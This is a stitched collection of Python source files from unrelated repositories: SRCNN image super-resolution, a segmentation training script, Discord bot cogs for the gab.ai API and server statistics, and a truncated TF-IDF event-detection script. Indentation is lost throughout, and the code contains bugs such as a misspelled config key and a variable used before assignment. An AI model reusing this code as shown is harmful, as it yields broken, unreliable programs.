for idx in range(len(valid_images)):
h, w, _ = valid_images[idx].shape
valid_input_y = valid_images[idx][:, :, 0]
valid_label_y = valid_labels[idx][:, :, 0]
valid_input_y = valid_input_y.reshape([1, h, w, 1])
valid_label_y = valid_label_y.reshape([1, h, w, 1])
result = self.sess.run(self.result, feed_dict={self.images: valid_input_y, self.labels: valid_label_y})
valid_label_y = crop_border(valid_label_y[0])
if i == 0:
bicubic_psnr.append(psnr(valid_label_y, crop_border(valid_input_y[0])))
valid_psnr.append(psnr(valid_label_y, result[0]))
print('[*] Epoch: [{:d}], psnr: [bicubic: {:.2f}, srcnn: {:.2f}], loss: [{:.8f}]'.format(i+1, np.mean(bicubic_psnr), np.mean(valid_psnr), loss/batch_idxs))
# Save model for every 50 epoch
if (i+1) % 50 == 0:
self.save(i+1, config)
print('[*] Training done ! Congrats :) ')
def test(self, config):
print('[*] SRCNN testing will be started ! ')
t = time.strftime('%Y-%m-%d-%H%M%S', time.localtime(time.time()))
test_images, test_labels = prepare_data(config, is_valid=False)
init = tf.global_variables_initializer()
results = []
bicubic_psnr = []
test_psnr = []
print('[*] Start testing !')
self.sess.run(init)
self.load(config)
for idx in tqdm(range(len(test_images))):
h, w, _ = test_images[idx].shape
test_input_y = test_images[idx][:, :, 0]
test_label_y = test_labels[idx][:, :, 0]
test_input_cbcr = test_images[idx][:, :, 1:3]
test_label_cbcr = test_labels[idx][:, :, 1:3]
test_input_y = test_input_y.reshape([1, h, w, 1])
test_label_y = test_label_y.reshape([1, h, w, 1])
test_input_cbcr = test_input_cbcr.reshape([1, h, w, 2])
test_label_cbcr = test_label_cbcr.reshape([1, h, w, 2])
result = self.sess.run(self.result, feed_dict={self.images: test_input_y, self.labels: test_label_y})
test_input_y = crop_border(test_input_y[0])
test_label_y = crop_border(test_label_y[0])
test_input_cbcr = crop_border(test_input_cbcr[0])
test_label_cbcr = crop_border(test_label_cbcr[0])
bicubic_psnr.append(psnr(test_label_y, test_input_y))
test_psnr.append(psnr(test_label_y, result[0]))
gt = concat_ycrcb(test_label_y, test_label_cbcr)
bicubic = concat_ycrcb(test_input_y, test_input_cbcr)
result = concat_ycrcb(result[0], test_input_cbcr)
path = os.path.join(os.getcwd(), config.result_dir)
path = os.path.join(path, t)
if not os.path.exists(path):
os.makedirs(path)
save_result(path, gt, bicubic, result, idx)
print('[*] PSNR of ground truth and bicubic : {:.2f}'.format(np.mean(bicubic_psnr)))
print('[*] PSNR of ground truth and SRCNN : {:.2f}'.format(np.mean(test_psnr)))
def save(self, epoch, config):
model_name = 'srcnn'
model_dir = 'SRCNN'
path = os.path.join(config.checkpoint_path, model_dir)
if not os.path.exists(path):
os.makedirs(path)
self.saver.save(self.sess, os.path.join(path, model_name), global_step=epoch)
print('[*] Save checkpoint at {:d} epoch'.format(epoch))
def load(self, config):
if config.use_pretrained:
model_dir = 'SRCNN_pretrained'
else:
model_dir = 'SRCNN'
path = os.path.join(config.checkpoint_path, model_dir)
ckpt_path = tf.train.latest_checkpoint(path)
if ckpt_path:
self.saver.restore(self.sess, ckpt_path)
print('[*] Load checkpoint: {}'.format(ckpt_path))
else:
print('[*] No checkpoint to load ... ')
```
#### File: jinsuyoo/SRCNN-Tensorflow/utils.py
```python
import tensorflow as tf
import numpy as np
import math
from PIL import Image
from tqdm import tqdm
import os
import h5py
FLAGS = tf.app.flags.FLAGS
# Read image
def imread(fname):
return Image.open(fname)
# Save image
def imsave(image, path, fname):
image = image * 255.
image = Image.fromarray(image.astype('uint8'), mode='YCbCr')
image = image.convert('RGB')
return image.save(os.path.join(path, fname))
# Save ground truth image, bicubic interpolated image and srcnn image
def save_result(path, gt, bicubic, srcnn, i):
imsave(gt, path, str(i)+ '_gt.png')
imsave(bicubic, path, str(i) + '_bicubic.png')
imsave(srcnn, path, str(i) + '_srcnn.png')
# Load sub-images of the dataset
def load_train_data():
with h5py.File('train.h5', 'r') as f:
images = np.array(f.get('data'))
labels = np.array(f.get('label'))
return images, labels
# Return true if the h5 sub-images file is exists
def exist_train_data():
return os.path.exists('train.h5')
def prepare_data(config, is_valid=False):
if is_valid:
dataset = config.valid_dataset
path = os.path.join(config.test_dataset_path, dataset)
else:
dataset = config.test_dataset
path = os.path.join(config.test_dataset_path, dataset)
dir_path = os.path.join(os.getcwd(), path)
path_gt = os.path.join(dir_path, 'gt')
path_lr = os.path.join(dir_path, 'bicubic_{:d}x'.format(config.scale))
# fnames = ['baby_GT.bmp, bird_GT.bmp, ...']
fnames = os.listdir(path_gt)
inputs = []
labels = []
count = 0
for fname in tqdm(fnames, desc='[*] Generating dataset ... '):
count += 1
_input = imread(os.path.join(path_lr, fname))
_label = imread(os.path.join(path_gt, fname))
_input = np.array(_input)
_label = np.array(_label)
inputs.append(_input / 255.)
labels.append(_label / 255.)
if is_valid:
print('[*] Successfully prepared {:d} valid images !'.format(count))
else:
print('[*] Successfully prepared {:d} test images !'.format(count))
return inputs, labels
# Concatenate Y and CrCb channel
def concat_ycrcb(y, crcb):
return np.concatenate((y, crcb), axis=2)
# Crop border of the image
def crop_border(image):
padding = int((5+9+1-3)/2)
if image.ndim == 3:
h, w, _ = image.shape
else:
h, w = image.shape
return image[padding:h-padding, padding:w-padding]
# Compute Peak Signal to Noise Ratio
# PSNR = 20 * log (MAXi / root(MSE))
def psnr(label, image, max_val=1.):
h, w, _ = label.shape
diff = image - label
rmse = math.sqrt(np.mean(diff ** 2))
if rmse == 0:
return 100
else:
return 20 * math.log10(max_val / rmse)
``` |
{
"source": "jinsuyun/DriavablaMap_Segmentation",
"score": 2
} |
#### File: jinsuyun/DriavablaMap_Segmentation/Train.py
```python
from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard
import tensorflow as tf
import Data
import Model
# import myslack
import os
import argparse
from tensorflow.python.client import device_lib
import warnings
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser(description='PyTorch Training')
parser.add_argument('--gpus', default='3', type=str, help='Which GPUs you want to use? (0,1,2,3)')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpus
# myslack.send_slack("start")
# path = 'D:/Models/'
path = 'Models/gpu2/'
# path = 'Models/'
#gpus = tf.config.experimental.list_logical_devices('GPUS')
#if gpus:
# tf.config.experimental.set_memory_growth(gpus[0], True)
def scheduler(epoch):
warmup = 3
warmup_lr = 1e-5 # 0.00001
threshold = 15
lr = 1e-4 # 0.0001
lr2 = 5e-5 # 0.00005
if epoch < warmup:
return warmup_lr
elif epoch == warmup:
return (lr + warmup_lr) / 2
elif epoch < threshold:
return lr
else:
return lr2
callback = [
ModelCheckpoint(path + 'model_{epoch:02d}-{val_iou_acc:.4f}_{iou_acc:.4f}.h5'),
LearningRateScheduler(scheduler, verbose=1),
# TensorBoard('./logs/', profile_batch=2)
]
#with tf.device('/XLA_GPU:0'):
b = 4
tr_batch = Data.Load_tr(batch_size=b)
te_batch = Data.Load_te(batch_size=b)
print(tr_batch)
c = 3
model = Model.SegModel(3)
model.load()
model.fit(tr_batch, te_batch, callback)
# myslack.send_slack("finish")
``` |
{
"source": "Jintaku/Trusty-cogs",
"score": 2
} |
#### File: Trusty-cogs/extendedmodlog/__init__.py
```python
from .extendedmodlog import ExtendedModLog
def setup(bot):
bot.add_cog(ExtendedModLog(bot))
```
#### File: Trusty-cogs/gabai/gabai.py
```python
import discord
from redbot.core import commands, checks, Config
import asyncio
import aiohttp
from datetime import datetime
from .gabuser import GabUser
__version__ = "2.0.1"
__author__ = "TrustyJAID"
BASE_URL = "https://api.gab.com/v1.0/"
class GabaiError(Exception):
pass
class NotFoundError(GabaiError):
pass
class Gabai(getattr(commands, "Cog", object)):
"""
Get information from gab.ai and display on discord
"""
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, 17864784635)
default_global = {
"api_token": {"client_id": "", "client_secret": "", "token": {}, "refresh_time": 0}
}
self.config.register_global(**default_global)
self.session = aiohttp.ClientSession(loop=self.bot.loop)
self.rate_limit_remaining = 60
self.rate_limit_time = 0
@commands.group()
async def gab(self, ctx):
"""
Add your gab tag to receive the role Anonymous
"""
pass
async def refresh_token(self):
api_token = await self.config.api_toke()
params = {
"grant_type": "refresh_token",
"refresh_token": api_token["token"]["refresh_token"],
"client_id": api_token["client_id"],
"client_secret": api_token["client_secret"],
"scope": "read engage-user engage-post write-post notifications",
}
async with self.session.post("https://api.gab.com/oauth/token", json=params) as resp:
token = await resp.json()
await self.config.api_token.token.set(token)
await self.config.api_token.refresh_time.set(
token["expires_in"] + datetime.now().timestamp()
)
async def get_header(self):
access_token = await self.config.api_token.token.access_token()
return {"Authorization": "Bearer {}".format(access_token)}
async def check_rate_limit(self):
"""Current rate limit is 60 calls per minute"""
time_now = int(datetime.now().timestamp())
if self.rate_limit_remaining == 60:
self.rate_limit_time = int(datetime.now().timestamp())
self.rate_limit_remaining -= 1
return
if self.rate_limit_remaining != 0:
self.rate_limit_remaining -= 1
return
else:
if time_now > (self.rate_limit_time + 60):
self.rate_limit_remaining = 59
self.rate_limit_time = time_now
else:
await asyncio.sleep(self.rate_limit_time + 60 - time_now)
async def get_gab_response(self, url, params=None):
await self.check_rate_limit()
header = await self.get_header()
async with self.session.get(BASE_URL + url, params=params, headers=header) as resp:
response = await resp.json()
if "status" in response:
raise NotFoundError(response["message"])
else:
return response
async def make_user_embed(self, user: GabUser):
url = "https://gab.ai/{}".format(user.username)
em = discord.Embed(description=user.bio[:1990], title=user.name, colour=int("4bd079", 16))
em.set_author(name=user.username, url=url, icon_url=user.picture_url_full)
em.set_thumbnail(url=user.picture_url_full)
em.add_field(name="Followers", value=user.follower_count)
em.add_field(name="Following", value=user.following_count)
em.add_field(name="Score", value=user.score)
acknowledgements = ""
if user.is_pro:
acknowledgements += "Pro, "
if user.verified:
acknowledgements += "Verified, "
if user.is_donor:
acknowledgements += "Donor, "
if user.is_investor:
acknowledgements += "Investor, "
if acknowledgements != "":
em.add_field(name="Acknowledgements", value=acknowledgements[:-2])
# em.set_image(url=user.cover_url)
return em
async def make_post_embed(self, post: dict):
username = post["actuser"]["username"]
post_id = post["post"]["id"]
url = "https://gab.ai/{}/posts/{}".format(username, post_id)
timestamp = datetime.strptime(post["post"]["created_at"], "%Y-%m-%dT%H:%M:%S+00:00")
attachment = post["post"]["attachment"]["type"]
colour = int("4bd079", 16)
likes = post["post"]["like_count"]
replies = post["post"]["reply_count"]
em = discord.Embed(description=post["post"]["body"], timestamp=timestamp, colour=colour)
if attachment is not None:
if attachment != "media":
em.set_image(url=post["post"]["attachment"]["value"])
else:
em.set_image(url=post["post"]["attachment"]["value"][0]["url_full"])
em.set_author(
name=post["actuser"]["username"], url=url, icon_url=post["actuser"]["picture_url"]
)
em.set_footer(text="{} Likes | {} Replies | Created at".format(likes, replies))
return em
async def gab_menu(
self,
ctx: commands.Context,
post_list: list,
message: discord.Message = None,
page=0,
timeout: int = 30,
):
"""menu control logic for this taken from
https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
post = post_list[page]
if ctx.channel.permissions_for(ctx.me).embed_links:
em = await self.make_post_embed(post)
else:
await ctx.send("I need embed_links permission to use this command.")
return
if not message:
message = await ctx.send(embed=em)
await message.add_reaction("⬅")
await message.add_reaction("❌")
await message.add_reaction("➡")
else:
# message edits don't return the message object anymore lol
await message.edit(embed=em)
check = (
lambda react, user: user == ctx.message.author
and react.emoji in ["➡", "⬅", "❌"]
and react.message.id == message.id
)
try:
react, user = await ctx.bot.wait_for("reaction_add", check=check, timeout=timeout)
except asyncio.TimeoutError:
await message.remove_reaction("⬅", ctx.me)
await message.remove_reaction("❌", ctx.me)
await message.remove_reaction("➡", ctx.me)
return None
else:
if react.emoji == "➡":
next_page = 0
if page == len(post_list) - 1:
next_page = 0 # Loop around to the first item
else:
next_page = page + 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("➡", ctx.message.author)
return await self.gab_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react.emoji == "⬅":
next_page = 0
if page == 0:
next_page = len(post_list) - 1 # Loop around to the last item
else:
next_page = page - 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("⬅", ctx.message.author)
return await self.gab_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
else:
return await message.delete()
@gab.command()
async def feed(self, ctx, username: str, before_date: str = None):
"""
Gets a users feed from gab.ai before a specified date
before_date must be in format DD-MM-YYYY
"""
await ctx.trigger_typing()
if before_date is None:
before_date = datetime.now().strftime("%Y-%m-%dT%H:%M%S%z")
else:
before_date = datetime.strptime(before_date, "%d-%m-%Y").strftime(
"%Y-%m-%dT%H:%M:%S+00:00"
)
try:
feed_info = await self.get_gab_response(
f"users/{username}/feed/", {"before": before_date}
)
except NotFoundError as e:
await ctx.send("{} {}".format(username, e))
return
await self.gab_menu(ctx, feed_info["data"])
@gab.command()
async def user(self, ctx, username: str):
"""
Get user information from gab.ai
"""
await ctx.trigger_typing()
try:
user_info = await self.get_gab_response(f"users/{username}")
except NotFoundError as e:
await ctx.send("{} {}".format(username, e))
return
user = GabUser.from_json(user_info)
em = await self.make_user_embed(user)
await ctx.send(embed=em)
@gab.command()
@checks.is_owner()
async def token(self, ctx, client_id: str, client_secret: str):
"""
Provide your client_id and client_secret
1. go to https://gab.ai/settings/clients then Developer Apps
2. Select Create app
3. Fillout the form and set the redirect url to https://localhost
4. Provide the client_id and client_secret
5. The bot will provide a link and ask for the code
6. post everything after `?code=` in discord
"""
await self.config.api_token.client_id.set(client_id)
await self.config.api_token.client_secret.set(client_secret)
url = f"https://api.gab.com/oauth/authorize?response_type=code&client_id={client_id}&redirect_uri=https://localhost&scope=%20read%20engage-user%20engage-post%20write-post%20notifications"
await ctx.send(
"Please go to the following url and provide the code supplied: {}".format(url)
)
check = lambda m: m.author.id == ctx.message.author.id
code = await self.bot.wait_for("message", check=check)
params = {
"grant_type": "authorization_code",
"code": code.content,
"client_id": client_id,
"client_secret": client_secret,
"redirect_uri": "https://localhost",
}
async with self.session.post("https://api.gab.com/oauth/token", json=params) as resp:
token = await resp.json()
if "error" in token:
await ctx.send(token["message"] + "\n\nMaybe try again/")
return
await self.config.api_token.token.set(token)
await self.config.api_token.refresh_time.set(
token["expires_in"] + datetime.now().timestamp()
)
await ctx.send("API Tokens set!")
def __unload(self):
self.bot.loop.create_task(self.session.close())
```
#### File: Trusty-cogs/serverstats/serverstats.py
```python
from random import choice, randint
import discord
import asyncio
import unidecode
import datetime
import aiohttp
import re
import itertools
from io import BytesIO
from redbot.core import commands
from redbot.core import checks, bank, Config
from redbot.core.i18n import Translator, cog_i18n
from redbot.core.utils.chat_formatting import pagify, box
from redbot.core.utils.menus import DEFAULT_CONTROLS, menu
from redbot.core.utils.predicates import MessagePredicate
from discord.ext.commands.converter import IDConverter
from discord.ext.commands.converter import _get_from_guilds
from discord.ext.commands.errors import BadArgument
from typing import Union, Optional
_ = Translator("ServerStats", __file__)
class FuzzyMember(IDConverter):
"""
This will accept user ID's, mentions, and perform a fuzzy search for
members within the guild and return a list of member objects
matching partial names
Guidance code on how to do this from:
https://github.com/Rapptz/discord.py/blob/rewrite/discord/ext/commands/converter.py#L85
https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/develop/redbot/cogs/mod/mod.py#L24
"""
async def convert(self, ctx, argument):
bot = ctx.bot
match = self._get_id_match(argument) or re.match(r"<@!?([0-9]+)>$", argument)
guild = ctx.guild
result = []
if match is None:
# Not a mention
if guild:
for m in guild.members:
if argument.lower() in unidecode.unidecode(m.display_name.lower()):
# display_name so we can get the nick of the user first
# without being NoneType and then check username if that matches
# what we're expecting
result.append(m)
continue
if argument.lower() in unidecode.unidecode(m.name.lower()):
result.append(m)
continue
else:
user_id = int(match.group(1))
if guild:
result.append(guild.get_member(user_id))
else:
result.append(_get_from_guilds(bot, "get_member", user_id))
if result is None:
raise BadArgument('Member "{}" not found'.format(argument))
return result
class GuildConverter(IDConverter):
"""
This is a guild converter for fuzzy guild names which is used throughout
this cog to search for guilds by part of their name and will also
accept guild ID's
Guidance code on how to do this from:
https://github.com/Rapptz/discord.py/blob/rewrite/discord/ext/commands/converter.py#L85
https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/develop/redbot/cogs/mod/mod.py#L24
"""
async def convert(self, ctx, argument):
bot = ctx.bot
match = self._get_id_match(argument)
result = None
if ctx.author.id != ctx.bot.owner_id:
# Don't need to be snooping other guilds unless we're
# the bot owner
raise BadArgument(_("That option is only available for the bot owner."))
if match is None:
# Not a mention
for g in bot.guilds:
if argument.lower() in g.name.lower():
# display_name so we can get the nick of the user first
# without being NoneType and then check username if that matches
# what we're expecting
result = g
else:
guild_id = int(match.group(1))
result = bot.get_guild(guild_id)
if result is None:
raise BadArgument('Guild "{}" not found'.format(argument))
return result
@cog_i18n(_)
class ServerStats(getattr(commands, "Cog", object)):
"""
Gather useful information about servers the bot is in
A lot of commands are bot owner only
"""
def __init__(self, bot):
self.bot = bot
default_global = {"join_channel": None}
self.config = Config.get_conf(self, 54853421465543)
self.config.register_global(**default_global)
async def on_guild_join(self, guild):
"""Build and send a message containing serverinfo when the bot joins a new server"""
channel_id = await self.config.join_channel()
if channel_id is None:
return
channel = self.bot.get_channel(channel_id)
em = await self.guild_embed(guild)
em.title = "{bot} has joined {server}".format(bot=channel.guild.me.name, server=guild.name)
await channel.send(embed=em)
async def guild_embed(self, guild):
"""
Builds the guild embed information used throughout the cog
"""
def check_feature(feature):
return "\N{WHITE HEAVY CHECK MARK}" if feature in guild.features else "\N{CROSS MARK}"
total_users = len(guild.members)
humans = len([a for a in guild.members if a.bot == False])
bots = len([a for a in guild.members if a.bot])
text_channels = len([x for x in guild.text_channels])
voice_channels = len([x for x in guild.voice_channels])
passed = (datetime.datetime.utcnow() - guild.created_at).days
created_at = _("Created on : {since}").format(
since=guild.created_at.strftime("%d %b %Y %H:%M")
)
try:
joined_at = guild.me.joined_at
except:
joined_at = datetime.datetime.utcnow()
bot_joined = joined_at.strftime("%d %b %Y %H:%M:%S")
since_joined = (datetime.datetime.utcnow() - joined_at).days
joined_on = _(
"Joined on : {bot_join}"
).format(bot_join=bot_joined)
em = discord.Embed(description=f"{created_at}\n{joined_on}")
em.add_field(
name=_("Members :"),
value=_(
"Total users : {total}\nHumans : {hum}\nBots : {bots}"
).format(
total=total_users,
hum=humans,
bots=bots,
),
)
em.add_field(
name=_("Utility :"),
value=_(
"Owner : {owner}\nServer ID : {id}"
).format(
owner=guild.owner,
id=guild.id,
),
)
em.title = guild.name
if guild.icon_url:
em.set_thumbnail(url=guild.icon_url)
else:
em.set_thumbnail(
url="https://cdn.discordapp.com/attachments/494975386334134273/529843761635786754/Discord-Logo-Black.png"
)
return em
async def on_guild_remove(self, guild):
"""Build and send a message containing serverinfo when the bot leaves a server"""
channel_id = await self.config.join_channel()
if channel_id is None:
return
channel = self.bot.get_channel(channel_id)
em = await self.guild_embed(guild)
em.title = "{bot} has left {server}".format(bot=channel.guild.me.name, server=guild.name)
await channel.send(embed=em)
async def ask_for_invite(self, ctx):
"""
Ask the user to provide an invite link
if reinvite is True
"""
check = lambda m: m.author == ctx.message.author
msg_send = _(
"Please provide a reinvite link/message.\n" "Type `exit` for no invite link/message."
)
invite_check = await ctx.send(msg_send)
try:
msg = await ctx.bot.wait_for("message", check=check, timeout=30)
except asyncio.TimeoutError:
await msg.edit(content=_("I Guess not."))
return None
if "exit" in msg.content:
return None
else:
return msg.content
async def get_members_since(self, ctx, days: int, role: discord.Role):
now = datetime.datetime.utcnow()
after = now - datetime.timedelta(days=days)
if role is None:
member_list = [m for m in ctx.guild.members if m.top_role < ctx.me.top_role]
else:
member_list = [m for m in role.members if m.top_role < ctx.me.top_role]
user_list = []
for channel in ctx.guild.text_channels:
if not channel.permissions_for(ctx.me).read_message_history:
continue
async for message in channel.history(limit=None, after=after):
if message.author in member_list:
member_list.remove(message.author)
return member_list
@commands.command()
@checks.is_owner()
@commands.bot_has_permissions(embed_links=True)
async def setguildjoin(self, ctx, channel: discord.TextChannel = None):
"""
Set a channel to see new servers the bot is joining
"""
if channel is None:
channel = ctx.message.channel
await self.config.join_channel.set(channel.id)
msg = _("Posting new servers and left servers in ") + channel.mention
await ctx.send(msg)
@commands.command()
@checks.is_owner()
async def removeguildjoin(self, ctx):
"""
Stop bots join/leave server messages
"""
await self.config.join_channel.set(None)
await ctx.send(_("No longer posting joined or left servers."))
async def guild_menu(
self, ctx, post_list: list, message: discord.Message = None, page=0, timeout: int = 30
):
"""menu control logic for this taken from
https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py"""
guild = post_list[page]
em = await self.guild_embed(guild)
if not message:
message = await ctx.send(embed=em)
await message.add_reaction("⬅")
await message.add_reaction("❌")
await message.add_reaction("➡")
await message.add_reaction("📤")
await message.add_reaction("📥")
else:
# message edits don't return the message object anymore lol
await message.edit(embed=em)
check = (
lambda react, user: user == ctx.message.author
and react.emoji in ["➡", "⬅", "❌", "\N{OUTBOX TRAY}", "\N{INBOX TRAY}"]
and react.message.id == message.id
)
try:
react, user = await self.bot.wait_for("reaction_add", check=check, timeout=timeout)
except asyncio.TimeoutError:
await message.remove_reaction("⬅", ctx.me)
await message.remove_reaction("❌", ctx.me)
await message.remove_reaction("➡", ctx.me)
await message.remove_reaction("\N{INBOX TRAY}", ctx.me)
await message.remove_reaction("\N{OUTBOX TRAY}", ctx.me)
return None
else:
if react.emoji == "➡":
next_page = 0
if page == len(post_list) - 1:
next_page = 0 # Loop around to the first item
else:
next_page = page + 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("➡", ctx.message.author)
return await self.guild_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react.emoji == "⬅":
next_page = 0
if page == 0:
next_page = len(post_list) - 1 # Loop around to the last item
else:
next_page = page - 1
if ctx.channel.permissions_for(ctx.me).manage_messages:
await message.remove_reaction("⬅", ctx.message.author)
return await self.guild_menu(
ctx, post_list, message=message, page=next_page, timeout=timeout
)
elif react.emoji == "\N{OUTBOX TRAY}":
try:
await self.confirm_leave_guild(ctx, guild)
except:
pass
elif react.emoji == "\N{INBOX TRAY}":
invite = await self.get_guild_invite(guild)
if invite:
await ctx.send(str(invite))
else:
await ctx.send(
_("I cannot find or create an invite for `{guild}`").format(
guild=guild.name
)
)
else:
return await message.delete()
@staticmethod
async def confirm_leave_guild(ctx, guild):
await ctx.send(
_("Are you sure you want to leave {guild}? (reply yes or no)").format(guild=guild.name)
)
pred = MessagePredicate.yes_or_no(ctx)
await ctx.bot.wait_for("message", check=pred)
if pred.result is True:
try:
await ctx.send(_("Leaving {guild}.").format(guild=guild.name))
await guild.leave()
except:
await ctx.send(_("I couldn't leave {guild}.").format(guild=guild.name))
else:
await ctx.send(_("Okay, not leaving {guild}.").format(guild=guild.name))
@staticmethod
async def get_guild_invite(guild: discord.Guild, max_age: int = 86400):
"""Handles the reinvite logic for getting an invite
to send the newly unbanned user
:returns: :class:`Invite`"""
my_perms: discord.Permissions = guild.me.guild_permissions
if my_perms.manage_guild or my_perms.administrator:
if "VANITY_URL" in guild.features:
# guild has a vanity url so use it as the one to send
return await guild.vanity_invite()
invites = await guild.invites()
else:
invites = []
for inv in invites: # Loop through the invites for the guild
if not (inv.max_uses or inv.max_age or inv.temporary):
# Invite is for the guild's default channel,
# has unlimited uses, doesn't expire, and
# doesn't grant temporary membership
# (i.e. they won't be kicked on disconnect)
return inv
else: # No existing invite found that is valid
channels_and_perms = zip(
guild.text_channels, map(guild.me.permissions_in, guild.text_channels)
)
channel = next(
(channel for channel, perms in channels_and_perms if perms.create_instant_invite),
None,
)
if channel is None:
return
try:
# Create invite that expires after max_age
return await channel.create_invite(max_age=max_age)
except discord.HTTPException:
return
@commands.command()
@checks.is_owner()
@commands.bot_has_permissions(embed_links=True)
async def getguild(self, ctx, *, guild: GuildConverter = None):
"""
Display info about servers the bot is on
`guild_name` can be either the server ID or partial name
"""
page = ctx.bot.guilds.index(ctx.guild)
if guild or await ctx.bot.is_owner(ctx.author):
page = ctx.bot.guilds.index(guild) if guild else page
await self.guild_menu(ctx, ctx.bot.guilds, None, page)
else:
await ctx.send(embed=await self.guild_embed(ctx.guild))
``` |
{
"source": "JinTang96/cv",
"score": 4
} |
#### File: essential/jinpackage/class_people.py
```python
class People:
# default constructor
def __init__(self, name):
self.name = name
def self_intro(self):
print(f"My name is {self.name}.")
def greet(self):
print("Good day everyone.")
```
#### File: essential/jinpackage/count.py
```python
def count(n):
print([i for i in range(1,n+1)])
``` |
{
"source": "Jin-Tao-208/web_science_coursework",
"score": 3
} |
#### File: Jin-Tao-208/web_science_coursework/event.py
```python
import time
import json
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
import re
import math
import numpy as np
doc_set = []
bol = False
count = 0
time_set = []
id_set = []
geo_set = []
location_set = []
noPlace_set = []
count21 = 0
with open('./original_data.json', 'r', encoding='utf-8')as f:
try:
while True:
line = f.readline()
if line:
d = json.loads(line)
if not d["retweet"]:
doc_set.append(d['text'])
# print(doc_set)
# time.sleep(1)
time_set.append(d['date'])
# print(time_set)
# time.sleep(1)
id_set.append(d['_id'])
# print(id_set)
# time.sleep(1)
geo_set.append(d['coordinates'])
# print(geo_set)
# time.sleep(1)
location_set.append(d['location'])
# print(location_set)
# time.sleep(1)
else:
break
except Exception as e:
print(e)
print("start Execute a tfidf process:")
eTimeStart = time.time()
# for x in range(0, len(result)):
# doc_set.append(result[x]['text'])
# time_set.append(result[x]['date'])
# id_set.append(result[x]['_id'])
# geo_set.append(result[x]['coordinates'])
# location_set.append(result[x]['location'])
tokenizer = RegexpTokenizer(r'\w+')
en_stop = get_stop_words('en')
k = doc_set
rekc = []
text1 = []
for i in k:
raw = i.lower()
raw = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '', raw, flags=re.MULTILINE)
# tokens = raw.split(" ")
tokens = tokenizer.tokenize(raw)
stopped_tokens = [i for i in tokens if not i in en_stop]
if len(stopped_tokens) == 0:
stopped_tokens = 'emptytweet'
# print(stopped_tokens)
text1.append(stopped_tokens)
wordSet = []
wordSet1 = []
def cosineSim(sentence1, sentence2):
seg1 = sentence1
seg2 = sentence2
word_list = list(set([word for word in seg1 + seg2]))
word_count_vec_1 = []
word_count_vec_2 = []
for word in word_list:
word_count_vec_1.append(seg1.count(word))
word_count_vec_2.append(seg2.count(word))
vec_1 = np.array(word_count_vec_1)
vec_2 = np.array(word_count_vec_2)
num = vec_1.dot(vec_2.T)
denom = np.linalg.norm(vec_1) * np.linalg.norm(vec_2)
cos = num / denom
sim = 0.5 + 0.5 * cos
return sim
for i in text1:
wordSet = list(set(wordSet).union(set(i)))
for i in range(0, len(text1)):
wordSet1.append(dict.fromkeys(wordSet, 0))
for sentence in range(0, len(text1)):
for word in text1[sentence]:
wordSet1[sentence][word] += 1
def computeTF(wordDict, bow):
tfDict = {}
bowCount = len(bow)
for word, count in wordDict.items():
tfDict[word] = count / float(bowCount)
return tfDict
tfresult = []
for x in range(0, len(text1)):
x = computeTF(wordSet1[x], text1[x])
tfresult.append(x)
def computeIDF(docList):
idfDict = {}
N = len(docList)
idfDict = dict.fromkeys(docList[0].keys(), 0)
for doc in docList:
for word, val in doc.items():
if val > 0:
idfDict[word] += 1
for word, val in idfDict.items():
idfDict[word] = math.log10(N / float(val))
return idfDict
idfresult = computeIDF(wordSet1)
def computeTFIDF(tfBow, idfs, cId):
tfidf = []
for word, val in tfBow.items():
tfidfInfo = []
tfidfInfo.append(word)
tfidfInfo.append([val * idfs[word], id_set[cId], time_set[cId], geo_set[cId], location_set[cId]])
tfidf.append(tfidfInfo)
return tfidf
tfidfResult = []
# for x in range(0, len(text1)):
# tfidfResult.append(computeTFIDF(tfresult[x], idfresult, x))
tfidfTime = time.time()
print("tf-idf spent time %.2f sec" % (tfidfTime - eTimeStart))
print("starting events find......")
worthResult = []
for x in range(0, len(text1)):
worthGroup = computeTFIDF(tfresult[x], idfresult, x)
worthGroupInfo = []
for i in range(0, len(worthGroup)):
if worthGroup[i][1][0] != 0:
columGroup = []
columGroup.append(worthGroup[i][0])
columGroup.append(worthGroup[i][1])
worthGroupInfo.append(columGroup)
worthResult.append(worthGroupInfo)
termTweets = []
count1 = 0
maktag = 0
count9 = 0
loopTimes = 0
count10 = 0
specicaial = []
# Calculation of events
for x in worthResult:
topV = []
# Fetch the TF-IDF values of the top 10
x.sort(key=lambda sublist: sublist[1][0], reverse=True)
if len(x) <= 10:
for i in x:
topV.append(i)
else:
topV = x[0:10]
# Put the first data directly store in
if count1 == 0:
timeMoment = time.mktime(time.strptime(topV[0][1][2], "%a %b %d %H:%M:%S +0000 %Y"))
termTweets.append([topV[0][0], [topV], timeMoment, count1])
count1 += 1
else:
setV1 = []
# Get the latest 10 events generating inverted table
termTweets.sort(key=lambda sublist: sublist[2], reverse=True)
marke = 0
for nsh in termTweets:
nsh[3] = marke
marke += 1
kid = 0
if len(termTweets) < 10:
for ki in termTweets:
setV1.append(ki)
else:
setV1 = termTweets[0:10]
# Compare to the inverted table to find sim result by cosine similarity
textA = []
for i in topV:
textA.append(i[0])
maxSim = 0
count3 = 0
for j in range(0, len(setV1)):
for i in setV1[j][1]:
for imp in i:
textB = []
for textlen in imp:
textB.append(textlen[0])
tempSim = cosineSim(textA, textB)
if tempSim > maxSim:
maxSim = tempSim
count3 += 1
# threshold 0.6. based on the findings from the related works
# (<NAME>, 2015, <NAME>, 2010)
if maxSim > 0.6:
setV2 = []
qid = 0
# mark1 = []
# The sequence of similar events is first found, and then the latest event is extracted
# from the result of the event to make up to top-10
for j in topV:
count4 = 0
